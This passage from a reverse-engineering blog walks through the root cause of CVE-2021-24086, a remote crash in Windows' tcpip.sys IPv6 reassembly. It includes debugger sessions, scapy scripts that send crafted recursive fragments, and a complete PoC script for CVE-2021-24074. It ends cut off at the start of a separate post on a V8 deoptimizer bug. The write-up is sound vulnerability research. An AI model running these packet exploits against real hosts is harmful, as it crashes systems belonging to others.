2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.
2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->NextHeader = Fragment->nexthdr;
  UnfragmentableLength = LOWORD(Packet->NetworkLayerHeaderSize) - 48;
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      FirstNetBuffer->DataOffset - Packet->NetworkLayerHeaderSize + 0x28,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
    NextHeaderOffset = Packet->NextHeaderPosition;
  }
  Reassembly->NextHeaderOffset = NextHeaderOffset;
  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}

3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.

At this stage we have an OK understanding of the data structures involved to keep track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // Below is the added code by the patch
  if ( TotalLength > 0xFFF ) {
      // Bail
  }

How cool is that? That's really rewarding. Putting in a bunch of work that may feel not that useful at the time, but eventually adds up, snow-balls and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back on this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference, bingo that is looking good!

After carefully analyzing the crash I've started to realize that the potential issue has been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0i64,
                                        0i64,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}

Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl as the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )

Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, it needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as to gain access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several time, it was a little bit confusing to me so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
  const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
  if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
    return 0i64;
// ...

Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;

This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *
id = 0xdeadbeef
first = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344) \
    / '---frag1'
second = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
    / '---frag2'
sendp([first, second], iface='eth1')

Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800`117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800`117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800`117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff800`11844478)]

kd> 
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800`117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
    NBL                ffffc107f7be1d90    Next NBL           NULL
    First NB           ffffc107f7be1f10    Source             NULL
                                           Pool               ffffc107f58ba980 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump


; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0                   Source pool        ffffc107f58ba980
    First MDL          0                   DataOffset         0
    Current MDL        [NULL]              Current MDL offset 0

    View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800`117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff800`11691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800`117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0n40                Source pool        ffffc107f58ba980
    First MDL          ffffc107f5ee8040    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

// ...

; Getting access to the backing buffer

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800`117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff800`11844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800`117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107`f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......

All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial right? That's initially what I thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't allow you to send packets bigger than like ~1200 bytes. Online content suggests that some ethernet cards and network switches allow you to bump this limit. Because I was running my test in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do that. The only parameter I found allowed me to bump the limit to about 9k which is very far from the 64k I needed to trigger this issue. At this point, I felt frustrated because I felt I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment and there was no way a 64k packet would work. But I ignored this hard truth for a bit of time.

Eventually, I accepted the fact that I was probably heading the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one that I would be able to trigger with packets thrown from the Internet. Maybe though there might be another code-path having a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I've noticed that the TotalLength field is also truncated a bit further down in the function and written in the IPv6 header of the packet. This header is eventually copied in the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;

My theory was that there might be some code that would read this Ipv6.length (which is truncated as __ROR2__ expects a uint16_t) and something bad might happen as a result. Although, the length would end up having a smaller value than the actual real size of the packet; it was hard for me to come up with a scenario where this would cause an issue but I still chased this theory as this was the only thing I had.

What I started to do at this point is to audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow and looked for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically so I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes but no hit. Ever. Frustrating.

After trying and trying I started to think that I might have been headed in the wrong direction again. Maybe, I really need to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right so I decided to start fresh again. Going back to the big picture, I've studied a bit more the reassembly algorithm, diffed again just in case I missed a clue somewhere, but nothing...

Could I maybe be able to fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I created a very large fragment that has many headers; enough to trigger the bug assuming I could trigger another reassembly. Then, I fragmented this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ....
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)

The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff801`0a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
    NB                 ffff800fa2a46f10    Next NB            NULL
    Length                10020            Source pool        ffff800fa06ba240
    First MDL          ffff800fa0eb1180    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
    NBL                ffff800fa2a46d90    Next NBL           NULL
    First NB           ffff800fa2a46f10    Source             NULL
                                           Pool               ffff800fa06ba240 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
  MDL ffff800fa0eb1180
    ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  `·····<@········
    ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
    ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

  ...

  MDL ffff800f9ff5e8b0
    ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
    ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

  ...

  MDL ffff800fa0937280
    ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·

What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ...
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

It is a fragment that is 10020 bytes long, and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
    / IPv6(dst = args.target) \
    / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
    / 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)

Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd> 
tcpip!Ipv6pReassembleDatagram+0xce:
fffff805`4a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff805`4a5cde42 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff805`4a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff805`4a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff805`4a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xed:
fffff805`4a5cde59 41b901000000    mov     r9d,1

kd> 
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff805`4a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd> 
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff805`4a5cde64 4533c0          xor     r8d,r8d

kd> 
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff805`4a5cde67 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff805`4a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff805`4a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff805`4a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists
13 NDIS!ndisCallReceiveHandler
14 NDIS!ndisInvokeNextReceiveHandler
15 NDIS!NdisMIndicateReceiveNetBufferLists
16 netvsc!ReceivePacketMessage
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup

Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Morale of the day: don't leave any rocks unturned, follow your intuitions and reach the state of no unknowns.

Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver found by Microsoft own's @piazzt. From zero to remote BSoD. The PoC is available on my github here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way there you should join and come hang in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low level subjects. Hopefully we can also generate more interest for external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

Bonus: CVE-2021-24074

Here is the Poc I built based on the high quality blogpost put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
    '''
    kd> g
    oob?
    tcpip!Ipv4pReceiveRoutingHeader+0x16a:
    fffff804`453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x16e:
    fffff804`453c6f7e 498bd5          mov     rdx,r13
    kd> db @r13
    ffffb90e`85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
    kd> dqs @r13 l1
    ffffb90e`85b78220  ffffb90e`85b782c0
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x171:
    fffff804`453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff804`4541f2e0)]
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x178:
    fffff804`453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`453b5164)
    kd> db @rdx
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17d:
    fffff804`453c6f8d 84c0            test    al,al
    kd> r.
    al=00000000`00000000  al=00000000`00000000
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17f:
    fffff804`453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804`453c7473)
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x185:
    fffff804`453c6f95 498bcd          mov     rcx,r13
    kd>
    Breakpoint 3 hit
    tcpip!Ipv4pReceiveRoutingHeader+0x188:
    fffff804`453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff804`45354f84)
    kd> dqs @rcx l1
    ffffb90e`85b78220  ffffb90e`85b782c0

    Call-stack (skip first hit):
      kd> kc
      # Call Site
      00 tcpip!Ipv4pReceiveRoutingHeader
      01 tcpip!IppReceiveHeaderBatch
      02 tcpip!Ipv4pReassembleDatagram
      03 tcpip!Ipv4pReceiveFragment
      04 tcpip!Ipv4pReceiveFragmentList
      05 tcpip!IppReceiveHeaderBatch
      06 tcpip!IppFlcReceivePacketsCore
      07 tcpip!IpFlcReceivePackets
      08 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
      09 tcpip!FlReceiveNetBufferListChainCalloutRoutine
      0a nt!KeExpandKernelStackAndCalloutInternal
      0b nt!KeExpandKernelStackAndCalloutEx
      0c tcpip!FlReceiveNetBufferListChain

    Snippet:
      __int16 __fastcall Ipv4pReceiveRoutingHeader(Packet_t *Packet)
      {
        // ...
        // kd> db @rax
        // ffffdc07`ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
        RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
        NetioAdvanceNetBufferList(NetBufferList, v8);
        OptionLenFirst = RoutingHeaderFirst[1];
        LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
        RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
        if (OptionLenFirst < 7u ||
          LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR))
        {
          // ...
          goto Bail_0;
        }
        // ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used for as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that, the out of bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #  - IppIsInvalidSourceAddressStrict,
                #  - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #     || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #         v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #         v14 < v13) )
                # The upper byte of handling_restrictions is `RoutingHeaderFirst[2]` in the above snippet
                # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                #   kd>
                #   tcpip!Ipv4pReceiveRoutingHeader+0x178:
                #   fffff804`5c076f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`5c065164)
                #   kd> db @rdx
                #   ffffdc07`ff209175  62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07  bc.T$0H...H.. ..
                #                                ^
                #                                |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface='eth1')

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', default = 'ff02::1')
    parser.add_argument('--dport', default = 500)
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()

Diary of a reverse-engineer
Modern attacks on the Chrome browser : optimizations and deoptimizationsJeremy "@__x86" Fetiveau
17 November 2020 at 08:00

Modern attacks on the Chrome browser : optimizations and deoptimizations

Diary of a reverse-engineer

By: Jeremy "@__x86" Fetiveau

17 November 2020 at 08:00

Introduction

Late 2019, I presented at an internal Azimuth Security conference some work on hacking Chrome through it's JavaScript engine.

One of the topics I've been playing with at that time was deoptimization and so I discussed, among others, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8. One of them was the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.

This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.

Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.

Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.

For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.

Table of contents:

Motivation

The commit

To understand this security bug, it is necessary to delve into V8's internals.

Let's start with what the commit says:

Fixes word64-lowered BigInt in FrameState accumulator

Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1873692
Reviewed-by: Georg Neis <[email protected]>
Commit-Queue: Nico Hartmann <[email protected]>
Cr-Commit-Position: refs/heads/master@{#64469}

It fixes VisitFrameState and VisitStateValues in src/compiler/simplified-lowering.cc.

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
         // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
         // truncated BigInts.
         if (TypeOf(input).Is(Type::BigInt())) {
-          ProcessInput(node, i, UseInfo::AnyTagged());
